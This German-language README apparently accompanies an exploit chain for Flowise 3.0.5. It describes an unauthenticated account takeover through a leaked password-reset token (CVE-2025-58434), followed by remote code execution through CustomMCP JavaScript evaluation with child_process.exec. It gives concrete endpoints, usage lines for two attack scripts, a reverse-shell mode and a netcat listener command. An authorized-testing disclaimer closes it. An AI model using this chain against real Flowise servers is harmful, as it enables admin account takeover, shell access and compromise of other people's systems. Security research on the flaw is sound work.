
Exploit-Kette für Flowise 3.0.5: Nicht authentifizierte Übernahme von Konten durch Offenlegung von Passwort-Reset-Tokens (CVE-2025-58434), verknüpft mit CustomMCP-JavaScript-Auswertung für Remote-Code-Ausführung.
Zwei Flowise-3.0.5-Probleme, verknüpft:
POST /api/v1/account/forgot-password gibt das tempToken des Zielbenutzers
direkt in der JSON-Antwort zurück. Führen Sie es POST /api/v1/account/reset-password
zu, um ein bekanntes Passwort für jedes Konto festzulegen, einschließlich des ersten Admins -> vollständige
Kontoübernahme ohne Authentifizierung.mcpServerConfig serverseitige JavaScript-Auswertung.
Mit einer Sitzung und einem Workspace-API-Schlüssel (aus Schritt 1),
POST /api/v1/node-load-method/customMCP mit loadMethod=listActions
wertet die mcpServerConfig-Zeichenfolge als JavaScript im Flowise-Prozess aus,
was -RCE ermöglicht. (Separates Flowise-Problem, das
hier nur verwendet wird, um die ATO in Codeausführung umzuwandeln; zum Zeitpunkt des
Schreibens wurde keine CVE zugewiesen.)require('child_process').exec()CVE: CVE-2025-58434
python3 -m pip install requests
flowise_ato_foothold.py - vollständige Kette (ATO -> API-Schlüssel -> CustomMCP-Reverse-Shell)python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# haben Sie `nc -lvnp <LPORT>` bereit
flowise_customMCP_rce.py - nur CustomMCP-RCE (benötigt einen API-Schlüssel)python3 flowise_customMCP_rce.py '<command>' '<FLOWISE_API_KEY>'
Nur für autorisierte Sicherheitstests und Bildungszwecke. Führen Sie dies nur gegen Systeme aus, die Ihnen gehören oder für die Sie ausdrückliche schriftliche Genehmigung zum Testen haben.
Autor: r3vpwnx